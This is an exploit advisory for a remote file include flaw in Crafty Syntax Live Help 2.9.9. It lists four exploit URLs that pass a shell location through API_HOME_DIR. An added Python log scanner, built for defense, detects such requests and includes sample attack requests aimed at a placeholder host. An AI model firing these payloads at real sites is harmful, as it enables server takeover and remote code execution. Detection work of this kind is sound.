
CSLH2.9.9 Remote File Include Vulnerabilities






#########################################################
CSLH2.9.9  Remote File Include Vulnerabilities
 
#########################################################

By Crackers_Child

crackers_child@sibersavascilar.com 

www.sibersavacilar.com 

#########################################################

Download Script

http://craftysyntax.com/CSLH2.9.9.zip 


#########################################################

#########################################################
Bug 

include_once(API_HOME_DIR . "util.php");
include_once(API_HOME_DIR . "const.php");
include_once(API_HOME_DIR . "stringparser.php");

#########################################################
Exploit
#########################################################

www.site.com/CSLH2_path/txt-db-api/stringparser.php?API_HOME_DIR=sh3ll? 

www.site.com/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=sh3ll? 

www.site.com/CSLH2_path/txt-db-api/sql.php?API_HOME_DIR=sh3ll? 

www.site.com/CSLH2_path/txt-db-api/resultset.php?API_HOME_DIR=sh3ll? 

#########################################################

Greetz:All My Friends !

#########################################################
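
Added example, not part of the original advisory: a Python check that flags access-log requests to the four txt-db-api scripts listed above when the query string sets API_HOME_DIR, and separately marks values that look like a remote URL. The log format, the sample lines and the hosts in them are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# The four script names listed in the advisory's Exploit section.
TARGETS = {"stringparser.php", "util.php", "sql.php", "resultset.php"}
PARAM = "API_HOME_DIR"
# Request field of a common/combined-format access log line (format assumed).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that starts like a URL: scheme://... or protocol-relative //host.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.I)

def classify(line):
    """Return None, 'param-set' or 'remote-value' for one log line."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    path = unquote(url.path).lower()
    if "/txt-db-api/" not in path or path.rsplit("/", 1)[-1] not in TARGETS:
        return None
    verdict = None
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name != PARAM:
            continue
        verdict = verdict or "param-set"
        # parse_qsl decoded once; decode again to catch double encoding.
        if REMOTE.match(value) or REMOTE.match(unquote(value)):
            verdict = "remote-value"
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict))
    return hits

# Constructed sample log lines (documentation addresses and hosts).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /CSLH2_path/txt-db-api/util.php?API_HOME_DIR=http://files.example/x? HTTP/1.1" 200 312',
    '198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /CSLH2_path/txt-db-api/sql.php?API_HOME_DIR=http%253A%252F%252Ffiles.example%252Fx HTTP/1.1" 200 0',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /CSLH2_path/index.php?page=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /CSLH2_path/txt-db-api/resultset.php?API_HOME_DIR=inc/ HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(f"line {n}: {verdict}")
```

Any hit deserves review, because these library files have no reason to receive API_HOME_DIR from a client; 'remote-value' hits are the ones to triage first.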
